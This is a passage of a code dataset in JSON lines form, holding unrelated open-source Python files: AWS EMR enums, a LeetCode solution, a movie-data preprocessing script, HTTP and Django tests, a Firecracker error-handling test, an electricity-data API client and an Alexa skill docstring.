enum_values=[EnumValue(\"MASTER\"), EnumValue(\"CORE\"), EnumValue(\"TASK\")]\n)\n\nEmrMarket = Enum(name=\"EmrMarket\", enum_values=[EnumValue(\"ON_DEMAND\"), EnumValue(\"SPOT\")])\n\nEmrRepoUpgradeOnBoot = Enum(\n name=\"EmrRepoUpgradeOnBoot\", enum_values=[EnumValue(\"SECURITY\"), EnumValue(\"NONE\")]\n)\n\nEmrScaleDownBehavior = Enum(\n name=\"EmrScaleDownBehavior\",\n enum_values=[\n EnumValue(\"TERMINATE_AT_INSTANCE_HOUR\"),\n EnumValue(\"TERMINATE_AT_TASK_COMPLETION\"),\n ],\n)\n\nEmrStatistic = Enum(\n name=\"EmrStatistic\",\n enum_values=[\n EnumValue(\"SAMPLE_COUNT\"),\n EnumValue(\"AVERAGE\"),\n EnumValue(\"SUM\"),\n EnumValue(\"MINIMUM\"),\n EnumValue(\"MAXIMUM\"),\n ],\n)\n\nEmrSupportedProducts = Enum(\n name=\"EmrSupportedProducts\", enum_values=[EnumValue(\"mapr-m3\"), EnumValue(\"mapr-m5\")]\n)\n\nEmrTimeoutAction = Enum(\n name=\"EmrTimeoutAction\",\n enum_values=[EnumValue(\"SWITCH_TO_ON_DEMAND\"), EnumValue(\"TERMINATE_CLUSTER\")],\n)\n\nEmrUnit = Enum(\n name=\"EmrUnit\",\n enum_values=[\n EnumValue(\"NONE\"),\n EnumValue(\"SECONDS\"),\n EnumValue(\"MICRO_SECONDS\"),\n EnumValue(\"MILLI_SECONDS\"),\n EnumValue(\"BYTES\"),\n EnumValue(\"KILO_BYTES\"),\n EnumValue(\"MEGA_BYTES\"),\n EnumValue(\"GIGA_BYTES\"),\n EnumValue(\"TERA_BYTES\"),\n EnumValue(\"BITS\"),\n EnumValue(\"KILO_BITS\"),\n EnumValue(\"MEGA_BITS\"),\n EnumValue(\"GIGA_BITS\"),\n EnumValue(\"TERA_BITS\"),\n EnumValue(\"PERCENT\"),\n EnumValue(\"COUNT\"),\n EnumValue(\"BYTES_PER_SECOND\"),\n EnumValue(\"KILO_BYTES_PER_SECOND\"),\n EnumValue(\"MEGA_BYTES_PER_SECOND\"),\n EnumValue(\"GIGA_BYTES_PER_SECOND\"),\n EnumValue(\"TERA_BYTES_PER_SECOND\"),\n EnumValue(\"BITS_PER_SECOND\"),\n EnumValue(\"KILO_BITS_PER_SECOND\"),\n EnumValue(\"MEGA_BITS_PER_SECOND\"),\n EnumValue(\"GIGA_BITS_PER_SECOND\"),\n EnumValue(\"TERA_BITS_PER_SECOND\"),\n EnumValue(\"COUNT_PER_SECOND\"),\n ],\n)\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/libraries/dagster-aws/dagster_aws/emr/types.py","file_name":"types.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"72878976808","text":"# link : https://leetcode.com/problems/move-zeroes\n# author : Mohamed Ibrahim\n\nclass Solution:\n def moveZeroes(self, nums: List[int]) -> None:\n \"\"\"\n Do not return anything, modify nums in-place instead.\n \"\"\"\n i = 0;cnt=0\n while i < len(nums):\n if nums[i] == 0:\n nums.pop(i)\n cnt+=1\n i-=1\n i+=1\n while cnt:\n nums.append(0)\n cnt-=1\n return nums\n \n \n","repo_name":"M0hamedIbrahim1/Problem-Solving-Python-","sub_path":"LeetCode/move-zeroes.py","file_name":"move-zeroes.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"14116941093","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 30 06:46:53 2019\n@author: rian-van-den-ander\n\"\"\"\n\n# ---- IMPORTS AND INPUTS -----\n\nimport numpy as np\nimport pandas as pd\nfrom encode_json_column import encode_json_column\nfrom datetime import datetime\n\n# Importing the dataset\ndataset = pd.read_csv('tmdb_5000_movies.csv')\ndataset_credits = pd.read_csv('tmdb_5000_credits.csv')\ndataset = pd.concat([dataset, dataset_credits], axis=1)\n\n# meaning out 0 budgets - there are a lot, so this is better than removing the rows\ndataset['budget']=dataset['budget'].replace(0,dataset['budget'].mean())\n\nX = dataset.iloc[:, :].values\ny_revenue = dataset.iloc[:, 
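The `moveZeroes` solution above pops zeros out of the list mid-iteration, which is O(n²) since every `pop(i)` shifts the remaining tail. The standard two-pointer rewrite does it in one in-place O(n) pass:

```python
from typing import List

def move_zeroes(nums: List[int]) -> None:
    """Shift all zeros to the end while preserving the order of non-zeros."""
    write = 0
    for read in range(len(nums)):
        if nums[read] != 0:
            nums[write], nums[read] = nums[read], nums[write]
            write += 1

nums = [0, 1, 0, 3, 12]
move_zeroes(nums)
print(nums)  # [1, 3, 12, 0, 0]
```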
12].values\ny_rating = dataset.iloc[:, 18].values\n\n\n# picking independent variables\nX = X[:,[0,1,4,9,11,13,14,15,22,23]]\n\n# Removing zero REVENUES from the data - revenue is super important\n# I could (and have) adjusted for inflation, but it made scant difference to model performance\ny_revenue_removed = []\ny_rating_removed = []\nX_removed = []\nfor l in range(0,len(y_revenue)):\n if y_revenue[l] !=0:\n y_revenue_removed.append(y_revenue[l])\n y_rating_removed.append(y_rating[l])\n X_removed.append(X[l])\ny_revenue = np.array(y_revenue_removed)\ny_rating = np.array(y_rating_removed)\nX = np.array(X_removed)\n\n# Ajusting inflation to 2019 at average inflation - 3.22%\n# do this only if using revenue (12 y index)\navg_inflation = 1.01322\nyear_now = 2019\nfor l in range(0,len(y_revenue)):\n try:\n film_year = int(X[l,4][0:4])\n y_revenue[l] = y_revenue[l]*(avg_inflation ** (year_now-film_year))\n X[l,7] = int(film_year)\n except:\n X[l,4] = 0\n\n# converting film date to day of year\n# i am arguably losing the 'year' which might be slightly correlated with film success\n# but that opens up a whole new can of worms about ratings and revenues by year\nfor l in range(0,len(y_revenue)):\n film_date = X[l,4]\n try:\n datetime_object = datetime.strptime(film_date, '%Y-%m-%d')\n X[l,4] = datetime_object.timetuple().tm_yday\n except:\n X[l,4] = 0\n\ndataset = pd.DataFrame(X)\n\n# encoding genres. \n# using name because \"id\" overlaps with \"id\" in the next encoding, and so on\ndataset = encode_json_column(dataset, 1,\"name\")\n\n# encoding keywords\n# limiting to 100 codes, and removing anything not within those 100\n# yes, it is column 1 now, since last column 1 was removed by previous encoding\ndataset = encode_json_column(dataset, 1, \"name\", 500, 1) #was 100\n\n# encoding production companies.\n# limiting to 100 codes, and removing anything not within those 100\ndataset = encode_json_column(dataset, 1,\"name\", 500, 1) #was 100\n\n# encoding all spoken languages\ndataset = encode_json_column(dataset, 3,\"iso_639_1\")\n\n# encoding cast\n# encoding 'just' top 500 cast\ndataset = encode_json_column(dataset, 4,\"name\", 5000, 1) #was 500\n\n# encoding crew\n# encoding 'just' top 500 cast\ndataset = encode_json_column(dataset, 4,\"name\", 5000, 1) #was 500\n\n#saving to CSVs as a checkpoint to be used in regressors\ndataset.to_csv(r'Encoded_X.csv')\ndataset_y_revenue = pd.DataFrame(y_revenue)\ndataset_y_revenue.to_csv(r'Encoded_y - revenue.csv')\ndataset_y_rating = pd.DataFrame(y_rating)\ndataset_y_rating.to_csv(r'Encoded_y - rating.csv')","repo_name":"ryan-anderson-ds/explorations","sub_path":"film_success/data_prep.py","file_name":"data_prep.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"39510296298","text":"import dataclasses as dc\nfrom contextlib import asynccontextmanager\nfrom json.decoder import JSONDecodeError\nfrom typing import Any, AsyncIterator, Awaitable, Callable, Dict, List, Optional, Union\nfrom typing_extensions import Literal\n\nfrom aiohttp import web\n\nMethod = Union[Literal[\"get\"], Literal[\"post\"], Literal[\"delete\"]]\nMETHODS = (\"get\", \"post\", \"delete\")\n\n\nclass ResponderException(Exception):\n pass\n\n\nclass InvalidPathException(ResponderException):\n pass\n\n\nclass BindAddressException(ResponderException):\n pass\n\n\nHandler = Callable[[web.Request], Awaitable[web.StreamResponse]]\n\n\n@dc.dataclass\nclass TrackedRequest:\n method: str\n 
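A small inconsistency in the inflation step above: the comment says average inflation of 3.22%, but `avg_inflation = 1.01322` encodes 1.322% per year. Either way, the adjustment is plain compounding, revenue × rate^(years elapsed):

```python
avg_inflation = 1.01322    # 1.322% per year, despite the 3.22% in the comment
year_now, film_year = 2019, 1999

revenue_then = 100_000_000
revenue_now = revenue_then * avg_inflation ** (year_now - film_year)
print(round(revenue_now))  # ~130 million after 20 years of compounding
```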
path: str\n valid: bool\n headers: Dict\n query: Dict\n json: Optional[Dict]\n\n\nclass RequestTracker:\n calls: List[TrackedRequest]\n expected_method: str\n expected_path: str\n\n def __init__(\n self: \"RequestTracker\", expected_path: str, expected_method: str\n ) -> None:\n self.calls = []\n self.expected_method = expected_method.lower()\n self.expected_path = expected_path\n\n @property\n def invalid_calls(self: \"RequestTracker\") -> List[TrackedRequest]:\n return [tr for tr in self.calls if not tr.valid]\n\n async def add(self: \"RequestTracker\", request: web.Request) -> None:\n valid = (\n request.method.lower() == self.expected_method\n and request.path == self.expected_path\n )\n try:\n json = await request.json()\n except JSONDecodeError:\n json = None\n\n self.calls.append(\n TrackedRequest(\n method=request.method.lower(),\n path=request.path,\n valid=valid,\n headers=dict(request.headers),\n query=dict(request.query),\n json=json,\n )\n )\n\n\n@asynccontextmanager\nasync def respond(\n *,\n json: Optional[Any] = None,\n body: Optional[Any] = None,\n text: Optional[str] = None,\n method: Method = \"get\",\n path: str = \"/\",\n status_code: int = 200,\n port: int = 5000,\n) -> AsyncIterator[RequestTracker]:\n if method.lower() not in METHODS:\n raise ValueError(f'\"{method}\" method isn\\'t supported')\n arg_count = sum(param is not None for param in (json, body, text))\n if arg_count != 1:\n raise ValueError(\"You need to provide only one of `json`, `body` or `text`\")\n\n # Set up temporary view\n async def view(request: web.Request) -> web.Response:\n if json is not None:\n return web.json_response(json, status=status_code)\n return web.Response(body=body, text=text, status=status_code)\n\n # Handle invalid paths\n request_tracker = RequestTracker(expected_method=method, expected_path=path)\n\n @web.middleware\n async def track_requests(\n request: web.Request, handler: Handler\n ) -> web.StreamResponse:\n # request_tracker.add.append((request.method.lower(), request.path))\n await request_tracker.add(request)\n return await handler(request)\n\n app = web.Application(middlewares=[track_requests])\n app.add_routes([getattr(web, method.lower())(path, view)])\n\n # Set up async runner\n runner = web.AppRunner(app)\n await runner.setup()\n site = web.TCPSite(runner, \"localhost\", port)\n try:\n await site.start()\n except OSError as e:\n raise BindAddressException(f\"Unable to bind address: {e.strerror}\") from e\n\n # Yield and then cleanup\n try:\n yield request_tracker\n finally:\n await runner.cleanup()\n\n # Make sure no requests were made to invalid paths\n if request_tracker.invalid_calls:\n invalid_call = request_tracker.invalid_calls[0]\n raise InvalidPathException(\n f'Invalid {invalid_call.method.upper()} request made to \"{invalid_call.path}\"'\n )\n","repo_name":"ikornaselur/local-responder","sub_path":"src/local_responder/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26511285514","text":"\"\"\"\nTests related specifically to integration with Morango.\n\"\"\"\nimport os\nimport unittest\n\nfrom django.test import TestCase\nfrom morango.controller import MorangoProfileController\nfrom morango.models import InstanceIDModel, Store\n\nfrom ..models import Facility, FacilityDataset, FacilityUser\n\n\nclass FacilityDatasetCertificateTestCase(TestCase):\n\n def test_creating_facility_creates_dataset(self):\n facility = 
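The `respond` helper above stands up a one-route aiohttp server and records every call it receives; a usage sketch of how a test might drive it, assuming the package is importable as `local_responder` (URL and port simply mirror the arguments passed in):

```python
import asyncio
import aiohttp
from local_responder import respond

async def main():
    async with respond(json={"ok": True}, method="get", path="/health", port=5000) as tracker:
        async with aiohttp.ClientSession() as session:
            async with session.get("http://localhost:5000/health") as resp:
                print(await resp.json())              # {'ok': True}
    print(len(tracker.calls), tracker.invalid_calls)  # 1 []

asyncio.run(main())
```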
Facility.objects.create(name=\"hallo\")\n self.assertIsNotNone(facility.dataset)\n\n def test_creating_facilitydataset_creates_certificate(self):\n dataset = FacilityDataset.objects.create()\n self.assertIsNotNone(dataset.get_root_certificate())\n\n def test_partition_and_id_values(self):\n facility = Facility.objects.create(name=\"hallo\")\n dataset_id = facility.dataset.id\n self.assertEqual(dataset_id, facility.dataset.get_root_certificate().id)\n self.assertEqual(dataset_id, facility.dataset._morango_source_id)\n self.assertTrue(facility.dataset._morango_partition.startswith(dataset_id))\n scope = facility.dataset.get_root_certificate().get_scope()\n for partition in scope.read_filter + scope.write_filter:\n self.assertTrue(partition.startswith(dataset_id))\n\n\nclass DateTimeTZFieldTestCase(TestCase):\n\n def setUp(self):\n self.controller = MorangoProfileController('facilitydata')\n InstanceIDModel.get_or_create_current_instance()\n\n @unittest.skipIf(os.environ.get('TOX_ENV') == 'postgres', \"Skipping testing on postgres because sql is not compatible.\")\n def test_deserializing_field(self):\n facility = Facility.objects.create(name=\"hallo\")\n FacilityUser.objects.create(username='jamie', facility=facility)\n self.controller.serialize_into_store()\n Store.objects.update(dirty_bit=True)\n try:\n self.controller.deserialize_from_store()\n except AttributeError as e:\n self.fail(e.message)\n","repo_name":"pnija/debian-installer","sub_path":"debian/kolibri/usr/lib/python3/dist-packages/kolibri/auth/test/test_morango_integration.py","file_name":"test_morango_integration.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"425478684","text":"from HOG_Processor import HOGExtractor\n\nimport numpy as np\nimport cv2 as cv\nimport pickle\nimport matplotlib.pyplot as plt\n\nclass CarFinder:\n\n\n def __init__(self, hogExtractor, svm, windowSize, slide_step):\n \"\"\"\n\n :param hogExtractor: the given hog extractor\n :param svm: support vector machine for classification, either linear SVC or SVC\n :param windowSize: size of the sliding winodw\n :param slide_step: number of pixel to move per sliding window\n \"\"\"\n self.slide_step = slide_step\n self.svm = svm\n self.hogExtractor = hogExtractor\n self.windowSize = windowSize\n self.detected_window = None\n self.detected_car = None\n\n\n def find_car(self, file_name, mode):\n \"\"\"\n\n :param file_name: file to the test image\n :param mode: : LinearSvc or SVC\n \"\"\"\n img = cv.imread(file_name)\n\n windowSizeX = self.windowSize\n windowSizeY = self.windowSize\n\n valid_windows = []\n valid_image= []\n\n for bottom_left_x in range(windowSizeX, img.shape[1], self.slide_step):\n for bottom_left_y in range(windowSizeY, img.shape[0], self.slide_step):\n\n x = (bottom_left_x - windowSizeX, bottom_left_x)\n y = (bottom_left_y - windowSizeY, bottom_left_y)\n\n if self.window_classfy( x, y, img, mode):\n valid_windows.append([x[0], x[1], y[0], y[1]])\n box_img = np.copy(img)[y[0]:y[1], x[0]:x[1], :]\n valid_image.append(box_img)\n\n self.detected_window = valid_windows\n\n with open(\"HogData/validWindows_\" + mode + '.pickle', 'wb') as handle:\n pickle.dump(valid_windows, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n num = 0\n for i in valid_image:\n cv.imwrite('results/' + str(num) + '.jpg', i)\n num += 1\n\n\n def window_classfy(self, x, y, img, mode):\n \"\"\"\n\n :param x: top left corner coordinate\n :param y: bottom right corner 
coordinate\n :param img: test image\n :param mode: LinearSVC or SVC\n :return:\n \"\"\"\n img = np.copy(img)[y[0]:y[1], x[0]:x[1], :]\n\n return self.svm.classify(img, mode)\n\n\n def find_group(self, file_name, data_file):\n \"\"\"\n\n :param file_name: path to the test image\n :param data_file: path to the stored detection data\n :return:\n \"\"\"\n img = cv.imread(file_name)\n\n with open(data_file, 'rb') as handle:\n validWindows = pickle.load(handle)\n\n print(validWindows)\n clusters = []\n for rect in validWindows:\n matched = 0\n for cluster in clusters:\n if (rect[0] <= cluster[1] and cluster[0] <= rect[1]\n and rect[2] <= cluster[3] and cluster[2] <= rect[3]):\n matched = 1\n cluster[0] = min(cluster[0], rect[0])\n cluster[1] = max(cluster[1], rect[1])\n cluster[2] = min(cluster[2], rect[2])\n cluster[3] = max(cluster[3], rect[3])\n cluster[4] += 1\n\n if not matched:\n\n rect.append(1)\n clusters.append(rect)\n\n detected = []\n final_clusters = []\n\n for cluster in clusters:\n if cluster[4] > 3:\n image = np.copy(img)[cluster[2]:cluster[3], cluster[0]:cluster[1],:]\n detected.append(image)\n final_clusters.append(cluster)\n\n return final_clusters, detected\n\n","repo_name":"EASONGUAN/DetectAndRecognize","sub_path":"Sliding_Window.py","file_name":"Sliding_Window.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35388683682","text":"from fungsi_parser import parser_tanggal\n\ndef validate_date(arr):\n #konfirmasi date harus DD/MM/YYYY\n if len(str(arr[0])) !=2 or len(str(arr[1])) !=2:\n print(\">>> Tanggal harus dalam format DD/MM/YYYY!\")\n return False\n elif(len(str(arr[2]))) != 4:\n print(\">>> Tanggal harus dalam format DD/MM/YYYY\")\n return False\n #ubah tanggal ke integer\n for j in range(len(arr)):\n arr[j] = int(arr[j])\n kabisat = False\n if ((arr[2] % 4 == 0) and (arr[2] % 100 != 0)) or (arr[2] % 4 == 0):\n kabisat = True\n if kabisat:\n if arr[1] == 2:\n if 1 <= arr[0] <= 29:\n return True\n else:\n return False\n else:\n if arr[1] == 2:\n if 1 <= arr[0] <= 28:\n return True\n else:\n return False\n if ((arr[1] == 1) or (arr[1] == 3) or (arr[1] == 5) or (arr[1] == 7) or (arr[1] == 8) or (arr[1] == 10) or (arr[1] == 12)) and (1 <= arr[0] <= 31):\n return True\n elif ((arr[1] == 4) or (arr[1] == 6) or (arr[1] == 9) or (arr[1] == 11)) and (1 <= arr[0] <= 30):\n return True\n else:\n return False","repo_name":"Adityapnn811/Program-Inventaris-Doremonangis","sub_path":"validate_tanggal.py","file_name":"validate_tanggal.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"19845791008","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase, Client\nfrom http import HTTPStatus\nfrom django.core.cache import cache\n\nfrom posts.models import Group, Post\n\nUser = get_user_model()\n\n\nclass PostsURLTests(TestCase):\n AUTHOR_NAME = 'author'\n ANOTHER_NAME = 'not_author'\n\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user = User.objects.create_user(username=cls.AUTHOR_NAME)\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='test-slug',\n description='Тестовое описание'\n )\n cls.post = Post.objects.select_related('author', 'group').create(\n text='Тестовое сообщение',\n author=cls.user,\n group=cls.group,\n )\n cls.available_urls = (\n '/',\n '/group/test-slug/',\n 
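In the `validate_tanggal.py` record above (its comments are Indonesian; it validates a DD/MM/YYYY date), the leap-year test `((y % 4 == 0) and (y % 100 != 0)) or (y % 4 == 0)` collapses to just `y % 4 == 0`, so century years like 1900 are wrongly treated as leap years; the second clause was presumably meant to check divisibility by 400. The standard predicate:

```python
def is_leap(year: int) -> bool:
    """Gregorian rule: divisible by 4, except centuries unless divisible by 400."""
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)

print(is_leap(2000), is_leap(1900), is_leap(2024))  # True False True
```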
f'/profile/{cls.AUTHOR_NAME}/',\n            f'/posts/{cls.post.id}/',\n        )\n        cls.templates_url_names = {\n            '/': 'posts/index.html',\n            f'/profile/{cls.AUTHOR_NAME}/': 'posts/profile.html',\n            '/group/test-slug/': 'posts/group_list.html',\n            '/create/': 'posts/create.html',\n            f'/posts/{cls.post.id}/': 'posts/post_detail.html',\n            f'/posts/{cls.post.id}/edit/': 'posts/create.html',\n            '/unexisting_page/': 'core/404.html',\n            '/follow/': 'posts/follow.html',\n        }\n\n    def setUp(self):\n        self.guest_client = Client()\n        self.authorized_client = Client()\n        self.authorized_client.force_login(self.user)\n        self.another_user = User.objects.create_user(\n            username=self.ANOTHER_NAME)\n        self.another_client = Client()\n        self.another_client.force_login(self.another_user)\n        cache.clear()\n\n    def test_pages_is_available_any_user(self):\n        \"\"\"The pages /, /group/<slug>/, /profile/<username>/ and /posts/<post_id>/\n        are available to any user.\n        \"\"\"\n        for url in self.available_urls:\n            with self.subTest(url=url):\n                response = self.guest_client.get(url)\n                self.assertEqual(response.status_code, HTTPStatus.OK)\n\n    def test_urls_uses_correct_template(self):\n        \"\"\"Each URL uses the corresponding template.\"\"\"\n        for url, template in self.templates_url_names.items():\n            with self.subTest(url=url):\n                response = self.authorized_client.get(url)\n                self.assertTemplateUsed(response, template)\n\n    def test_page_redirect_anonymous_on_admin_login(self):\n        \"\"\"The /create/ page redirects an anonymous user\n        to the login page.\n        \"\"\"\n        response = self.guest_client.get('/create/', follow=True)\n        self.assertRedirects(response, '/auth/login/?next=/create/')\n\n    def test_page_authorized_user_create_post(self):\n        \"\"\"The /create/ page is available to an authorized user\"\"\"\n        response = self.authorized_client.get('/create/')\n        self.assertEqual(response.status_code, HTTPStatus.OK)\n\n    def test_page_author_edit_post(self):\n        \"\"\"The /posts/<post_id>/edit/ page is available to its author\"\"\"\n        response = self.authorized_client.get(\n            f'/posts/{self.post.id}/edit/')\n        self.assertEqual(\n            self.post.author.get_username(),\n            self.user.username)\n        self.assertEqual(response.status_code, HTTPStatus.OK)\n\n    def test_page_not_author_not_can_edit_post(self):\n        \"\"\"The /posts/<post_id>/edit/ page is not available\n        to an authorized user who is not the author\"\"\"\n        response = self.another_client.get(f'/posts/{self.post.id}/edit/')\n        self.assertNotEqual(\n            self.post.author.get_username(),\n            self.another_user.username)\n        self.assertEqual(response.status_code, HTTPStatus.NOT_FOUND)\n\n    def test_unexisting_pages(self):\n        \"\"\"The /unexisting_page/ URL (a non-existent page)\n        returns 404 to any user\"\"\"\n        response = self.guest_client.get('/unexisting_page/')\n        self.assertEqual(response.status_code, HTTPStatus.NOT_FOUND)\n","repo_name":"AndreyZyuzin/hw05_final","sub_path":"yatube/posts/tests/test_urls.py","file_name":"test_urls.py","file_ext":"py","file_size_in_byte":4501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18705777120","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Apr 13 14:44:22 2018\r\n\r\n@author: Alex\r\n\"\"\"\r\nimport requests\r\nurl = 'http://www.perseus.tufts.edu/hopper/xmlchunk?doc=Perseus%3Atext%3A1999.01.0134%3Abook%3D1%3Acard%3D1'\r\n\r\nresponse = requests.get(url)\r\n\r\nif not response.ok:\r\n    response.raise_for_status()\r\n    \r\nfile = open('iliad-perseus.xml', 'wb')\r\nfile.write(response.content)\r\nfile.close()\r\n\r\nfrom xml.etree import ElementTree as ET\r\n\r\ndoc 
= ET.parse('iliad-perseus.xml').getroot()\r\n\r\nchaps = doc.findall('.//div1[@type=\"chapter\"]')\r\nprint(\"Found\", len(chaps), \"chapters.\")\r\n\r\nplaintext = []\r\n\r\nfor chap in chaps:\r\n for note in chap.findall('note'):\r\n chap.remove(note)\r\n \r\n this_text= ' '. join(chap.itertext())\r\n plaintext.append(this_text)\r\n \r\niliad = ' '.join(plaintext)\r\n\r\nprint(len(iliad))","repo_name":"amkaminski/PersonalProjects-LogosEndiathetos","sub_path":"Illiad_Reader/iliadPerseus.py","file_name":"iliadPerseus.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22342721748","text":"import platform\n\nimport pytest\n\nfrom framework.utils import wait_process_termination\n\n\n@pytest.mark.skipif(\n platform.machine() != \"aarch64\",\n reason=\"The error code returned on aarch64 will not be returned on x86 \"\n \"under the same conditions.\",\n)\ndef test_enosys_error_code(uvm_plain):\n \"\"\"\n Test that ENOSYS error is caught and firecracker exits gracefully.\n \"\"\"\n # On aarch64 we trigger this error by running a C program that\n # maps a file into memory and then tries to load the content from an\n # offset in the file bigger than its length into a register asm volatile\n # (\"ldr %0, [%1], 4\" : \"=r\" (ret), \"+r\" (buf));\n vm = uvm_plain\n vm.spawn()\n vm.memory_monitor = None\n vm.basic_config(\n vcpu_count=1,\n boot_args=\"reboot=k panic=1 pci=off init=/usr/local/bin/devmemread\",\n )\n vm.start()\n\n # Check if FC process is closed\n wait_process_termination(vm.firecracker_pid)\n\n vm.check_log_message(\n \"Received ENOSYS error because KVM failed to emulate an instruction.\"\n )\n vm.check_log_message(\"Vmm is stopping.\")\n","repo_name":"firecracker-microvm/firecracker","sub_path":"tests/integration_tests/functional/test_error_code.py","file_name":"test_error_code.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":22949,"dataset":"github-code","pt":"53"} +{"seq_id":"14315481877","text":"import os\nimport collections\nimport requests\nimport pandas as pd\n\nelectricitymap_token = os.getenv(\"AUTH_ELECTRICITYMAP\")\n\n\ndef get_data(zones):\n data = []\n countries = pd.unique(zones[\"country\"])\n for country in countries:\n zones_of_country = zones[zones[\"country\"] == country]\n ids = pd.unique(zones_of_country[\"zone_id\"])\n country_co2_levels_raw = []\n country_consumption_total = []\n country_co2_levels_cleaned = []\n mix = {}\n # CO2\n for id in ids:\n res = requests.get(\n f\"https://api.electricitymap.org/v3/power-breakdown/latest?zone={id}\",\n headers={\"auth-token\": electricitymap_token},\n ).json()\n country_consumption_total.append(\n sum(res.get(\"powerConsumptionBreakdown\").values())\n )\n co2 = requests.get(\n f\"https://api.electricitymap.org/v3/carbon-intensity/latest?zone={id}\",\n headers={\"auth-token\": electricitymap_token},\n ).json()\n country_co2_levels_raw.append(co2.get(\"carbonIntensity\"))\n # Mix\n mix_res = requests.get(\n f\"https://api.electricitymap.org/v3/power-breakdown/latest?zone={id}\",\n headers={\"auth-token\": electricitymap_token},\n ).json()\n production = mix_res.get(\"powerConsumptionBreakdown\")\n for key, value in production.items():\n mix[key] = mix.get(key, 0) + value\n # Top 3 mix\n tuples = collections.Counter(mix).most_common(3)\n top3 = []\n for tuple in tuples:\n top3.append(\n tuple + (str(round(tuple[1] / sum(country_consumption_total) * 100)),)\n )\n for 
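`get_data` above computes each country's CO2 intensity as a consumption-weighted average over its zones; the arithmetic in isolation (the two-zone numbers are made up):

```python
zone_intensity = [120, 300]      # gCO2eq/kWh reported per zone
zone_consumption = [8000, 2000]  # total power consumption per zone

weighted = sum(i * c for i, c in zip(zone_intensity, zone_consumption))
country_co2 = round(weighted / sum(zone_consumption))
print(country_co2)  # 156 -- the larger zone dominates the average
```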
co2_level, production_level in zip(\n country_co2_levels_raw, country_consumption_total\n ):\n country_co2_levels_cleaned.append(co2_level * production_level)\n co2 = round(sum(country_co2_levels_cleaned) / sum(country_consumption_total))\n data.append({\"country\": country, \"co2\": co2, \"mix\": mix, \"top3\": top3})\n return data\n","repo_name":"Robin-C/electricitymap_twitter","sub_path":"scripts/utils/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"73098240487","text":"# ---------- Import ----------\nfrom collections import defaultdict\nimport sys\ninput = sys.stdin.readline\n\n# ---------- Main ----------\nN, M = map(int, input().split())\nID_PW = defaultdict()\n\nfor _ in range(N):\n ID, PW = map(str, input().rstrip().split())\n ID_PW[ID] = PW\n \nfor _ in range(M):\n print(ID_PW[input().rstrip()])","repo_name":"miny-genie/BOJ","sub_path":"acmicpc_17219..py","file_name":"acmicpc_17219..py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23331810425","text":"#!/usr/bin/python3\nif __name__ == \"__main__\":\n import sys\n length = len(sys.argv) - 1\n if length == 0:\n txt = \".\"\n else:\n txt = \":\"\n\n if length == 1:\n txt2 = \"\"\n else:\n txt2 = \"s\"\n print(\"{} argument{}{}\".format(length, txt2, txt))\n for i in range(1, length + 1):\n print(\"{}: {}\".format(i, sys.argv[i]))\n","repo_name":"mateog91/holbertonschool-higher_level_programming","sub_path":"0x02-python-import_modules/2-args.py","file_name":"2-args.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20314192744","text":"\"\"\"\nSimple Python Lambda service that uses a simplified my_py.py file to provide simple\nresponses to simple \"fact\"-like intents. The example my_py.py with this repo supports\nthe following:\n\nIntents supported:\n\n Custom:\n About\n Contact\n Upcoming\n\n Required:\n LaunchRequest (request type that calls launch function in my_py)\n AMAZON.HelpIntent (intent that calls help function in my_py)\n AMAZON.CancelIntent or AMAZON.StopIntent (intent, both use end function in my_py)\n\nNote, that as long as you keep your intents in sync with your skill intentSchema, you can\nsimply update or add intents as functions to the my_py.py and the lambda service will use them.\nIntents in your Schema may be mixed case -- this code will convert to lower case.\n\nFurthermore, using this template will make it easier to make an external API call or DB call\nto form the response. If you want to stick to simply updating text, you can try out the S3\nbranch where you can update the responses in a JSON file (no code).\n\nFurther note, there is .travis.yml in this repo that does two things:\n 1) Deploys this code to your configured lambda function.\n 2) Deploys the ../responses/response.json to your bucket.\n\nIf you fork this repo or create your own copy and keep it as a public repo, you can use\nTravis to deploy to your lambda. 
